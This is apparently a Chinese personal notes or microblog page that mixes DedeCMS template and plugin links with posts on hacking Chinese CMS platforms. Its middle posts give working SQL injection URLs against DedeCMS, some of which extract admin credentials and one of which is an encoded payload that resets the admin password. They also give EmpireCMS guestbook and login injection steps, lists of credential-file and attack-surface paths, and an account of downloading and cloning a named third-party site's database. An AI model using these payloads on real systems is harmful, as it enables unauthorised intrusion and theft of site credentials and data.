微博搜索

关键词:微博 评论 昵称

看起来还不错的模板 PC版本 手机版本 详情
织梦手机版生成html插件

2017/3/13 16:05:03 通过网页

dedecms移动端静态化
http://bbs.zhanzhang.baidu.com/forum.php?mod=attachment&aid=NjY2NDl8YjhiY2JjZjR8MTQ3MjQ1NDY0NHw4MDIxODJ8MTE0Mjgx

2016/9/1 15:38:27 通过网页

DEDECMS数据库配置文件在哪?如何进行配置
dede数据库配置文件所在路径为:/data/common.inc.php
$cfg_dbhost = 'localhost';网站地址
$cfg_dbname = 'data';数据库名
$cfg_dbuser = 'data_user';数据库用户名
$cfg_dbpwd = 'admin';数据库连接密码
$cfg_dbprefix = 'dede_';数据库前缀
$cfg_db_language = 'gbk';数据库语言版本

2016/7/2 15:18:15 通过网页

砍柴网http://www.moke8.com/dedecms/m63982/

2016/6/23 0:35:09 通过网页

模板http://www.xiuzhanwang.com/dedecms_zx/568.html

2016/6/23 0:32:39 通过网页

利用工具:链接

2016/6/15 18:16:14 通过网页

工具软件:通杀dedecms plus/search.php漏洞利用

/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
member/operation.php

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

PHPCMS V9 \phpcms\base.php
PHPWIND8.7 \data\sql_config.php
DEDECMS5.7 \data\common.inc.php
DiscuzX2 \config\config_global.php
Wordpress \wp-config.php
Metinfo \include\head.php

/manager/ewebeditor/admin/default.php

2016/6/15 17:49:46 通过网页

dedecms织梦搜索页利用
/* 代码0
/plus/search.php?keyword=as&typeArr[ uNion ]=a


/* 代码1
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a"
Dim exp2 As String = "/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,6

/* 代码2
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
Error infos: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,2' at line 1
Error sql: SELECT channeltype FROM `www_arctype` WHERE id=11=@`\'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `www_admin`#@`\'` LIMIT 0,1;

2016/6/15 17:40:43 通过网页

帝国cms系统利用路径
/e/DoInfo/ChangeClass.php?mid=1 投稿
/e/member/register/ChangeRegister.php 注册
/e/member/list/ 会员列表
/e/member/login/ 会员登陆
/e/admin/ 后台登陆
/e/config/config.php 后台安全设置
e/tool/gbook/?bid=1 留言
触发漏洞的步骤为:
Step1.在“姓名”处输入:縗
Step2.在“联系邮箱”处输入:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
Step3.“留言内容”随意填写,输入完毕后点击“提交”按钮。

/e/member/login/login.php?user=%df%20or%201=1%20limit%201,1%23&pass=
select * from cms_user where username=運or 1=1 limit 1,1# and password="

2016/6/13 13:10:36 通过网页

国产cms利用dedecms织梦-php168齐博-ecshop
【dedecms 织梦cms】
/plus/flink_add.php 友情链接页面
/member/index_do.php?fmdo=user&dopost=regnew 会员注册页面
/plus/erraddsave.php 挑错页面
/plus/search.php 搜索页面
/plus/heightsearch.php 高级搜索页面
/plus/guestbook.php 留言板
/tags.php tag页面
/member/index.php?uid= 会员
【齐博cms 上传】
会员中心:/member/
会员页 /member/homepage.php?uid=
注册入口:/do/reg.php
登陆入口/do/login.php
搜索页面 /do/search.php
投稿 /do/post.php
投稿发布 /member/post.php?job=postnew&fid=3
友链 /do/friendlink.php /do/friendlink.php?job=apply
密码找回 /do/sendpwd.php
【ecshop】
/admin/privilege.php 后台
/search.php 搜索
/user.php?act=register 会员注册
/user.php 用户登陆
/flow.php 购物车
/tag_cloud.php 标签云
/pick_out.php 网站地图
/quotation.php 报价
/article.php?id= 文件路径
/message.php 留言板

2016/6/8 14:55:11 通过网页

获取到别人网站的数据库文件拿来玩玩~
数据库连接出错提示:数据库连接失败('e:\vhost\wwwroot\tadecai\www\data\#7Mx7Ey.mdb'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。)
网址:http://www.tadecai.com/old/
直接输入http://www.tadecai.com/old/data/#7Mx7Ey.mdb 因为#是在url里有特殊含义 所以无法下载。 网上查了"#"的编码是 %23
附编码表链接:链接
得到地址:http://www.tadecai.com/old/data/%237Mx7Ey.mdb 下载得到了一个5MB的文件。。。电脑尚装办公套件的数据库软件儿 可以打开瞧瞧都有啥。。。。如果能分析出这是个啥cms 那就直接下载这个cms 把数据库替换下。。。哈哈 马上就可以山寨他的网站了。

2016/5/24 14:00:44 通过网页

织梦CMS的蜘蛛爬行记录工具 织梦-搜索蜘蛛爬行记录插件

2016/5/11 12:47:34 通过网页

齐博cms 上传
会员中心:/member/
注册入口:/do/reg.php
登陆入口/do/login.php
到会员系统后 可以上传图片和其他文件:
上传实例:
以下内容需要输入正确密码才可以查看!

2016/4/29 17:48:11 通过网页

metinfo cms 链接

2016/4/18 13:48:00 通过网页

蓝色展示型公司企业网站DEDE织梦模板 下载链接

2016/2/20 14:45:55 通过网页

期待已久的邱嵩松博客导航 qiusongsong.net/dh/程序Asp版终于上线(qiusongsong.com终于提供下载)了。加邱嵩松博客导航总群33832398获取密码

以下内容需要输入正确密码才可以查看!

2016/2/16 12:00:19 通过网页

DiscuzX3.2手机触屏模板 say手机模板 商业版 dz分类信息手机模板 链接

2016/1/20 22:12:36 通过网页

DEDECMS免费模板 - 通用蓝色医院WAP手机网站模板 链接 直接下载

2016/1/20 22:03:42 通过网页

织梦dedecms在线客服插件v1.0.0下载 百度盘

2016/1/20 21:54:52 通过网页

共计:31 条记录 每页:20条12